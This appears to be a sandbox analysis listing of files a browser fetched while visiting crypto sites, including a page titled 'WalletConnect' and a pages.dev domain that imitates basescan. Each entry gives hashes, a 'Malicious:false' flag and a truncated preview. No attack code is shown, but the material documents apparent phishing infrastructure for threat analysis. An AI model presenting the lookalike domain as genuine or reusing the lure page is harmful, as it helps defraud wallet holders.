                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (559)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):560
                                                                                                                                                                                                                                              Entropy (8bit):4.808277179023729
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:wOtb3Lgwt2dti4/EfKwfvtUGzhXsJLZlLNMeWHTAqZpW8InWiu:wOhEXjJcVfvuehcdZbMeQAqZpyn8
                                                                                                                                                                                                                                              MD5:A95451EBD244375FB304EB994F68284C
                                                                                                                                                                                                                                              SHA1:74F86ECF5F4C90D05E80EFF3B27974896CB62547
                                                                                                                                                                                                                                              SHA-256:7C6B9EEA3D6DED152620650BEA6CD0CE6EC8C7EF9D23948F0FA627484611E9A7
                                                                                                                                                                                                                                              SHA-512:53284C98756651C0CE0BB7B9D1D23E934482EAFE000B387FD955E386F2E9CB4B446910AD7595E8F76F40802A54F7552D93A9F0DF163BBAEBBC43066C985A2C43
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/router-3828f409.js
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{A:t,HashRouter:s,MemoryRouter:a,Navigate:r,Route:o,Router:u,StaticRouter:c,_mergeSearchString:i,action:n,cache:h,createAsync:m,createAsyncStore:R,createBeforeLeave:l,createMemoryHistory:v,createRouter:S,json:b,keepDepth:g,notifyIfNotBlocked:y,redirect:d,reload:f,revalidate:p,saveCurrentDepth:A,useAction:M,useBeforeLeave:B,useCurrentMatches:H,useHref:L,useIsRouting:N,useLocation:P,useMatch:_,useNavigate:k,useParams:C,useResolvedPath:D,useSearchParams:I,useSubmission:j,useSubmissions:q}=e.l5q36m;export{t as A,I as a,C as b,P as u};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1949)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1950
                                                                                                                                                                                                                                              Entropy (8bit):5.336245913714392
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:xCUBk9D9EWdxFMwsHPNJWHbjyLqjSTyKeFyBpSMAmSAUc54fQ5XxdJXQs04f+Kyx:ZkTRDMweEjRIPYmSCi4BBf+B+0Fh
                                                                                                                                                                                                                                              MD5:6280CD50F7F5CF60A37E6BEC70B08E27
                                                                                                                                                                                                                                              SHA1:C9D2376E7FCBE95130B0707AB0C22B3C67A12001
                                                                                                                                                                                                                                              SHA-256:58A5A8C7917A7196C7408CEEA2024ED23D2C6C997E02C3C8E32E12744392318F
                                                                                                                                                                                                                                              SHA-512:A0FC4F9C178DB99251E1DDB249C3E689B2D08457A976D7689C4EB13554FB865ED99050B0CE4040C922E36B42709D897AE08F0497A0BD880165C54842C8E58C7F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/currency-format-1c532f37.js
                                                                                                                                                                                                                                              Preview:import{c as F,j as x,b as p,i as T,t as d}from"./web-13cf6287.js";import{h as v,c as I,e as g,a as c,k as S,D as f,$ as m,s as U}from"./manifest-51a3674f.js";import{n as P,m as _,c as A,E as k,p as w}from"./solid-js-38561dfe.js";import{b as D}from"./_baseGetTag-c2e287b9.js";import{a as E}from"./isArray-79a0be9c.js";var j="[object Boolean]";function B(e){return e===!0||e===!1||E(e)&&D(e)==j}var b=d("<span>"),z=d("<img>");const N=P(),i=()=>{const e=w(N);if(!e)throw Error("Can not used CurrencyFormat outside of CurrencyFormat component");return e},l=e=>{const r=_({currencyName:"USDFIAT"},e),n=()=>r.toCurrency?B(r.toCurrency)?v.setting.localeCurrencyName:r.toCurrency:r.currencyName;return F(N.Provider,{value:{currencyName:()=>r.currencyName,toCurrency:n},get children(){return r.children}})},Z=e=>(()=>{var r=b();return x(r,p(e,{get class(){return I("inline-flex items-center gap-x-1",e.class)}}),!1,!1),r})(),G=e=>{const r=i(),n=()=>S.coinIcon(e.forceToCurrency||r.toCurrency());return(()=>{va
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26248)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):26249
                                                                                                                                                                                                                                              Entropy (8bit):5.226789394394794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:/Vuvc/99j9ZpoPNdZ2kDYehU5hto05TJ0XjOgvNnBGZxccQC4EhrR6:/IvG9J9mNDYezjhB2xb4K6
                                                                                                                                                                                                                                              MD5:9C2D29914D07D7C54A2BF3C6727CA68B
                                                                                                                                                                                                                                              SHA1:EA94274EAA95FAFE71947B30D61AFC1BAA9A4D78
                                                                                                                                                                                                                                              SHA-256:8B5E88927EFD4131C8CAE11321316AD4A07A0C9D70AEE36FC0344C38416C3A1C
                                                                                                                                                                                                                                              SHA-512:EFFD4EABE041240F7C47A65EA2F8E26EC201F03068D8239BF86B1310EDBEFCDAA298CEE19A128A577D2A47404A16C82C15355F81F88910930EDAEB05F285A5D5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/manifest-e71017e8.js
                                                                                                                                                                                                                                              Preview:var d=(s,l,r)=>new Promise((u,a)=>{var e=_=>{try{n(r.next(_))}catch(i){a(i)}},o=_=>{try{n(r.throw(_))}catch(i){a(i)}},n=_=>_.done?u(_.value):Promise.resolve(_.value).then(e,o);n((r=r.apply(s,l)).next())});const D="modulepreload",p=function(s){return"/modules/account2/"+s},m={},t=function(l,r,u){if(!r||r.length===0)return l();const a=document.getElementsByTagName("link");return Promise.all(r.map(e=>{if(e=p(e),e in m)return;m[e]=!0;const o=e.endsWith(".css"),n=o?'[rel="stylesheet"]':"";if(!!u)for(let c=a.length-1;c>=0;c--){const E=a[c];if(E.href===e&&(!o||E.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${e}"]${n}`))return;const i=document.createElement("link");if(i.rel=o?"stylesheet":D,o||(i.as="script",i.crossOrigin=""),i.href=e,document.head.appendChild(i),o)return new Promise((c,E)=>{i.addEventListener("load",c),i.addEventListener("error",()=>E(new Error(`Unable to preload CSS for ${e}`)))})})).then(()=>l()).catch(e=>{const o=new Event("vite:preloadError",{canc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5526
                                                                                                                                                                                                                                              Entropy (8bit):5.5187788998653735
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:ODWZAXgyVnk1PaPwbTJX4Kbh/ago2RPjhkuj:rZAXgyVk1PaPk9IKQgh5j
                                                                                                                                                                                                                                              MD5:A50897FEA252B972449A9E246AA69FD7
                                                                                                                                                                                                                                              SHA1:E6D089C4B43227DB5062742EDB336DFABFB5CD6B
                                                                                                                                                                                                                                              SHA-256:5F8034781BA252E676DB2ADA75CB3D98DF874AA3747830223141FEFBED71C906
                                                                                                                                                                                                                                              SHA-512:A8C0E8B266778EC533ACD54F2921D6680DA3808D194084DFF60DD064793B648B50233337A05D83600BD427685B65ABD74A40A4BB11F3B44A2512AC55EB60C987
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js
                                                                                                                                                                                                                                              Preview:/*.CryptoJS v3.1.2.code.google.com/p/crypto-js.(c) 2009-2013 by Jeff Mott. All rights reserved..code.google.com/p/crypto-js/wiki/License.*/.var CryptoJS=CryptoJS||function(g,j){var e={},d=e.lib={},m=function(){},n=d.Base={extend:function(a){m.prototype=this;var c=new m;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},.q=d.WordArray=n.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=j?c:4*a.length},toString:function(a){return(a||l).stringify(this)},concat:function(a){var c=this.words,p=a.words,f=this.sigBytes;a=a.sigBytes;this.clamp();if(f%4)for(var b=0;b<a;b++)c[f+b>>>2]|=(p[b>>>2]>>>24-8*(b%4)&255)<<24-8*((f+
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1438)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):51879
                                                                                                                                                                                                                                              Entropy (8bit):5.226741198964019
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:qwh9i1bwF/X3P5F+O4PsJcEn8XN+Er5FIdBoe5RtZpNT5Jt9rvZaLdXQtJXmaIus:ZJwsR/7zO9
                                                                                                                                                                                                                                              MD5:C5B7C6A285DE01396DBD5E9C4C6E7F3B
                                                                                                                                                                                                                                              SHA1:2BAFD0F87E620CAF2CDCB363BEC5B940874299A3
                                                                                                                                                                                                                                              SHA-256:451AA4A96AEE683E12085563A614FC1502D951325D29CABB676C240DE80ADE71
                                                                                                                                                                                                                                              SHA-512:4827D6A549B7EEF53B9160ACD6C9E833CBB1132ECACA5CBD27E4F8F73879D6E4CABB248F893430F091BF4D2F2DBAE4B51250754B7316EDCB981D640C8EFCC9A3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/custom/commonjs.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:var strAge=$("#hdnAgeText").val();var strDateTime=$("#hdnDateTimeText").val();var strDateTimeLocal="Date Time (Local)";var strDateTimeLocalShort="Local";var strSiteName=$("#hdnSiteName").val();var strAgeTitle=$("#hdnAgeTitle").val();var strDateTimeTitle=$("#hdnDateTimeTitle").val();var ageClass=".showAge";var dateTimeClass=".showDate";var localDateTimeClass=".showLocalDate".var localDateTimeNFTClass=".showLocalDateNFT".var offsetHoursFinal;var strTxnFee=$("#hdnTxnText").val();var strGasPrice=$("#hdnGasPriceText").val();function checkAdBlock(){var element=document.createElement("div");element.id="checkAdBlock".element.className="banner_ad";element.style.width="0.5px";document.body.appendChild(element);if($("#checkAdBlock").width()>0){return false;}else{return true;}}.function setAgeDateTimeCookie(strValue){var d=new Date();d.setFullYear(d.getFullYear()+1);var expires="expires="+d.toUTCString();document.cookie=strSiteName+"_switch_age_datetime="+strValue+";"+expires+";path=/";}.function
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 387 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):28252
                                                                                                                                                                                                                                              Entropy (8bit):7.8622048805343
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:RvWx3Itqn+EKd/eLnkzJgca0svVvK4H34NyCC88Yxw2O:8x3oqn+EKdGQpZsvVvhX4IC91VO
                                                                                                                                                                                                                                              MD5:7169A33930E9A76592047633021C3F6F
                                                                                                                                                                                                                                              SHA1:8DF032C5460D0B033DCB78F2CF5374ABDC4A0BC5
                                                                                                                                                                                                                                              SHA-256:20B3485EAEBDE1F3546A9BA385EE6A11E31F7A0BB1B6536C7805B512876714BA
                                                                                                                                                                                                                                              SHA-512:B5C1DD04B42F43EABDF6D3156B0E52AD63853240E5CB28BB817DAD1E20AA3C037FFE4E67106F9EDB386B5204B5463BE106BC6E90A7C3B6A65466F7B9F8E312BA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/casino-sigma-africa-2022-Z2LHG0cN.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............~.C....PLTE..o..kXZP.._{vZ..^UXL..a..j..enlU..rwsY..o{vZ..i..q..j..b^`R..e..m..i..l..p.....o..m..p.._..c..h..o..j..k..kpsi..stpX..q..n..a[]N..pkhT..m..g..l..g.|];EE.....................|..Y`anwx......irt..............................|.w..................z................................`cX..m..p..kBEI..`..e..q.z\..p..r..p..r..q..p..r..q..s...>FGAHI<CD<AB=CD:CD<AB;BC<BC:AB:BC@EI9?@>FF;BB@DH8?@>FF:BB>EE8?A<CC:@A:AB<DD8>A<CC:@A;CF:AB;BB9@B:DD9>B;BC:AA;BE:AB>CD:AB;AC9?A:CC:AB;BB;AB:AB;BC:AC=CE9AB:AB:BB:AB:AA;BC9@A;AB8?A:BC:AB:@A:BC9?A:AB:AB:AB<AB8@@:@B:CC7??6=>5;<5;<4:;;CC<BC:AB8@@:@B:BC9@A:AB:AB..q..n|wZ..h..q..n..c..p..j..g..r..^.}]..k..h..p..r..s..s..s}x[..r..rjk`..ndgX............t|.qzz.......p......tRNS.EkbqL{..Q.E.By.a:p.....y~.P]j.vtc%.J.f@.X....Y0.a.n..gX?K..R...]k.O.{..1.D.d.>Z...S7.r.5...#JX.=..F...................... !"$$&'())*+,,.011234456889:;<>?@BBDFGIKKMMOPRSTUWYZZ[\[WUSP_]]^_abceeY.*.l0.O?.68qS.....?..*.0...|CG..s..i..jsIDATx...}...A......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32073), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):253680
                                                                                                                                                                                                                                              Entropy (8bit):5.143374112659264
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:GkHOJo1g7SV7opRBXDrtnAcKzvFYi/5uLO1aG0qFf/nHOl16j:LY/K3COVlFHS16j
                                                                                                                                                                                                                                              MD5:7EA717799EF7FA610F53EA03784FF68E
                                                                                                                                                                                                                                              SHA1:680FA38FCC529A5C2DE45A928B05BECFB5071542
                                                                                                                                                                                                                                              SHA-256:2AD4F5D82E27B67E902B6E50CDAC99E7F7FFDA9CCAD7F950DC4526EA41FB4776
                                                                                                                                                                                                                                              SHA-512:22AAC09F08A592A36125F851B3FAC0929BA87240418E7356B711250E89C39EA3E9F5B453B11B6670E93FC22519277DC43FA0B8A6901475192BD9E4E64E75B36E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*! jQuery UI - v1.12.1 - 2016-09-14..* http://jqueryui.com..* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sorta
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                              Entropy (8bit):7.968420296433682
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:kfXlpssnZCNP1beRg6qaNNUiP5zgbdTCCFaoxJ++5MPSNg+cWWwaU68L9cATJ:eX7JgNP1OjqaDwdZF5xEpeL9f
                                                                                                                                                                                                                                              MD5:A62AB0EA830CCC9DF1FA6789B133D2CE
                                                                                                                                                                                                                                              SHA1:2B62E59AAAD324BA54B608549F1F83982A8ADD9F
                                                                                                                                                                                                                                              SHA-256:75686F014B8517BFA8B4A0CBF655AAC774E762075DCAA9463E9372D1DC7F0FED
                                                                                                                                                                                                                                              SHA-512:4A52F23664F7C5F712E8CE504775609BCBBB50A4F687C70DF467E27D34B7CCE2E32FA61276ED6ED22A65B34A86EA85CAC843D22741A61DC75AFB44B662D73600
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^..i..8.E]D.....R.....Nf..evVyz... ...L.........|..j.#..zx{.....u;.5....Ul}..c...\......-..?.._6....MLo;oGM.,.W..y...>......w?.?...2.0.w|..p.....*....={...s;...v......>O...n..3..,.l.j(1....N..wj0.:.....`..HoD.k..n..SE&.....[.:}.y....W|bt.-^.....q=|...... ...t..tc...7..Yo......;....5.}....W^..;c....d....D..l.zsPk"<......km.......gb..p99.s.....S......g].....OGv....._nZ...n...j...#.j,.......(....Azh.^I.O..I.a.......E..{.Q..c~....R..SvSv}.2L.IHCh.s..$."..T...UH?.j^..s.l.=ya.....v.G...zSV\.d......>y..J....*..X.:.>.x)J.......T'.G.............xu......]e.~s[..Z....#)2.#VhPSK...W...].....T..^..W3|0Zc}!.5>,...........r6.U.$.."'l..Z\.P.<....t..*}5....!....kF.q5.^..9.....hX_;..&...".k+..V...=..h}-..j:a}....{.K.\..Y~yJm.n..}..R;ms..,w'....Fw.Zy.l.e...h,.q...4.|%....y}..XbeQ.j^..$..ve..n.......'/n...i...kw[..I..W.6.L...'...C^.,....uKV..Ju...U...|[.y.V.}...g#........U.]V..WA..2CR.;.1...p.'.L..w3D.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9125
                                                                                                                                                                                                                                              Entropy (8bit):7.966095311247733
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:jLWfMz+lQURujR+0qPwvcnY8DFR3zmOyxpB1QGPt93xEod06oKYYU:fsQuujy/Jj365PB1dCnXp
                                                                                                                                                                                                                                              MD5:01264932E68866DCB1341D5E2679D9D2
                                                                                                                                                                                                                                              SHA1:4E40448A637CE63C7DE4F6D00B6AF57973E7E221
                                                                                                                                                                                                                                              SHA-256:C612B8968E1354DA378BD1C352A857E4BC94FD5580EEF31BE7222E546B588499
                                                                                                                                                                                                                                              SHA-512:DCE09A5DC95777E198A364C7C01DC31B55C20BC3C7162FF02864093ABCC7A0CD24556DB9FF8F447F35FB39A97C5440396F578AB40DFD356FCC861BF909951D04
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^..k..8.d!2..:g..[0....$...4M."..`.r=.:....?.....r..qGZ...#'.8p.'w.-../..y../.=.i......o[..n.>.w..;....R..M.....w.}.&.......f.+s........s...|n.../..;..z....;,....|>...{.~.....w|z.l~..w....e.....y].K......,......ddZ.1Vvl..G.z.........#.)..|g'2u.....|.).W..]........Gd...:.....Y...).'....G.....'t.&./.V}.D....>>.. .2}~..,..sy.,......*..}.!.P.%.a......X.._..0...~......}~..J....q._~........B.*?*9.....F@v&...j.......:_euk.7q....iK.gw~.1C...&...%;......R.2...!..1kAN..E..`./9..]..M.1...h.N....$...3$.E\....t..H.18P;..2...G....n0px4.........X. .\.i..........Jc._Cj.i.a..Q.H..2..%.....2IXk[b'...7#..-d.m.......s..DZ.|C...e}..c)+%......r...qiK[. .....^s...\...y!G.. .n..?]...p..O. w.D._F%8&...}ZVr...7t>2w.2.^......pD6H_{.I.p.J.U......M.!..{.`'.r.p."E....-.U.?.g3F....ls.&.....]e%@.2.J.%...u...vf.....^x.V.....n....j..y42JP..{...%........w....u_VE.8.......3.pf..^..w...w...)..8B'....-.......j...6.a..)...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 280 x 281, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9428
                                                                                                                                                                                                                                              Entropy (8bit):7.934220844029983
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:2335zlnshpC3kO3do2wPSQ6Ok5ehjO2aAaUkyDy80qSQ:2HRhs+Sp60hjO2Paye80qX
                                                                                                                                                                                                                                              MD5:9802D5BAAF4D52A08D06764B65239582
                                                                                                                                                                                                                                              SHA1:EB289037B42074FF41682A4F717BFF2E1A5ED3A2
                                                                                                                                                                                                                                              SHA-256:3BA846EE97FFF9960EE6B91539195E355C9C6798BFC0866174C160F3268DDE92
                                                                                                                                                                                                                                              SHA-512:36532229898A0AE84F86A2F2A925C94666E5242B04ACC0F6078A04B97CE5C90CB73FFEC0445051C854E9E8A76935CC31117A586941811B546FA9E462A6182649
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............{.......PLTEGpL.k...d.....l.t.{...]..Y..........Q..S.zU.cH.iJ..Q.|O.wN.sM.oK.jE.]=.b?.i@.pA.{C.uE..F.|I...T..M..U........J...........O..T...Y..^..S..X.].c.h.l.o.s.w.z.}................................................t..y..|.t.l..f..m..e..c.~a.{`.x^.t\.rZ.oY..`..e..[..U._KxVCoR@jO>fL<aI:]E8XC7ThR.@5P>4L:2H70C..f......i.qP.wS......vR.nN.....[...........F......tRNS...........................................................................................................................q.n....A.S..&......"_IDATx....n. ..`....5............ch.m....=n&.0...................1e.4Mq.....T....a..G....6..y^..z.TZ....t.:O..p>.v.(.....%.F &.6Oi..."....zs.7iF.......3..Y.FG\X...E....z....6..k.......R.V6K..o....#O.cCA~a.5;.f.s.j%z...G.J.b.R.:..R....8r...R.9R.;.F.j......q.J..l....'n...6]..P.|..%..G....-5i........./n.7Y$.....@~.....D.@.2..h.....?...mbj...gn..iI...........4.....v.........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1206)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1207
                                                                                                                                                                                                                                              Entropy (8bit):5.384612292322804
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Y2x5EF1tw6LGQzCPKVUSrcCTbmkoIa0IOeOCUMW9qM31eioyFqz7:YY5MvCAUPCTyjIa0IOeOHpvleJyF+
                                                                                                                                                                                                                                              MD5:A4A5C0E7A9CF5D29D3BA22755409875B
                                                                                                                                                                                                                                              SHA1:22D52E33A0520900E516CA570835D9FE0C7CAE44
                                                                                                                                                                                                                                              SHA-256:BB2EA3D374695C19E5A6A12D9C78058480D239376817927FF3F5E1DBED7308ED
                                                                                                                                                                                                                                              SHA-512:7373A801F01DA48E0F3DAA6FA019F8703A7B5EB54485871E91265B57AB66806BECC24DA7FB7DA5D2D06723B0233053E91077E6A925DD59EDAAFC1873AF744AE8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/useGoogleLogin-5a174152.js
                                                                                                                                                                                                                                              Preview:var c=(g,r,s)=>new Promise((i,o)=>{var e=t=>{try{a(s.next(t))}catch(p){o(p)}},n=t=>{try{a(s.throw(t))}catch(p){o(p)}},a=t=>t.done?i(t.value):Promise.resolve(t.value).then(e,n);a((s=s.apply(g,r)).next())});import{c as m}from"./web-170e0195.js";import{r as l,o as u}from"./solid-js-bce2a176.js";import{g as f,h as d,U as T}from"./UnableLogin-924f35fd.js";import{c as h,d as L,f as U,t as y,g as S,p as k}from"./manifest-e71017e8.js";import"./toInteger-d3049371.js";import"./toNumber-2a781ab2.js";import"./isObject-010a5422.js";import"./isObjectLike-e68f0fe0.js";import"./i18n-78ff9edb.js";const F=function(r){const s=o=>c(this,null,function*(){const e=yield S().get(`/account/self-exclusion/status/${o}/`),n=e.startTime+e.period*30*864e5;k.push(()=>m(T,{get startTime(){return e.startTime},endTime:n}))}),i=o=>c(this,null,function*(){try{L.emit("sensorsTrack",{event:"third_register_click",account_type:"google"}),yield d({fullName:o.fullName,idToken:o.idToken,openUserId:o.openUserId,userType:"google"
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
